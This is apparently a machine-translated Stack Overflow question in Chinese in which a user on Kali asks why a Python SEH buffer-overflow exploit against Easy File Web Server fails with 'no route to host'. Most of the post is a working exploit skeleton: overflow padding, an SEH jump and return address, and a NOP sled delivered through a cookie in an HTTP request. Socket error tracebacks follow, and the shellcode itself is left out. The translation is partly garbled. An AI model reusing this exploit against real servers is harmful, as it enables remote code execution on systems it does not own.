Python 如何避免此套接字。错误:[Errno 113]没有到主机的路由?
我试图利用Easy File Web服务器上的SEH缓冲区溢出进行攻击。但是,我得到以下错误:Python 如何避免此套接字。错误:[Errno 113]没有到主机的路由?,python,sockets,Python,Sockets,我试图利用Easy File Web服务器上的SEH缓冲区溢出进行攻击。但是,我得到以下错误: root@kali:~/Desktop#python default.py [+]正在发送漏洞利用。。。。 回溯(最近一次呼叫最后一次): 文件“default.py”,第42行,在 s、 连接((主机、端口)) 文件“/usr/lib/python2.7/socket.py”,第228行,meth格式 返回getattr(self.\u sock,name)(*args) socket.error:
root@kali:~/Desktop#python default.py
[+]正在发送漏洞利用。。。。
回溯(最近一次呼叫最后一次):
文件“default.py”,第42行,在
s、 连接((主机、端口))
文件“/usr/lib/python2.7/socket.py”,第228行,meth格式
返回getattr(self.\u sock,name)(*args)
socket.error:[Errno 113]没有到主机的路由
这是我的代码:
import sys, socket, struct
shellcode ("Ignore the shellcode.")
host = '192.168.40.156'
port = 8080
evil = "\x90" * 4 + shellcode
buffer = "A" * 4059 + "\xEB\x06\x90\x90" + "\x34\x03\x01\x10" + evil + "D" * 578
httpreq = (
"GET /changeuser.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + host + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + host + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
print "[+]Sending the Exploit...."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(httpreq)
s.close()
print "Done!"
如何解决此错误
- 这两台机器可以相互敲击
- 受害者机器的防火墙已关闭
[+]正在发送漏洞利用。。。。
回溯(最近一次呼叫最后一次):
文件“default.py”,第42行,在
s、 连接((主机、端口))
文件“/usr/lib/python2.7/socket.py”,第228行,meth格式
返回getattr(self.\u sock,name)(*args)
socket.error:[Errno 111]连接被拒绝
解决错误套接字。错误:[Errno 113]没有到主机的路由?
我重新启动了我的电脑(攻击者的机器)
解决[Errno 111]连接被拒绝的问题
我重新启动了我的网络适配器(在攻击者的机器重新启动后,受害者机器突然无法ping回攻击者的机器)意思是服务器重置了连接。听起来好像有人发现了你的计划并关闭了易受攻击的服务。这个问题与运行时网络堆栈配置(路由表正确性)有关,而与软件开发无关。同样的问题将影响任何其他工具,包括最终用户工具,如
ping
,telnet
等;因此,我们不在这里讨论这个话题。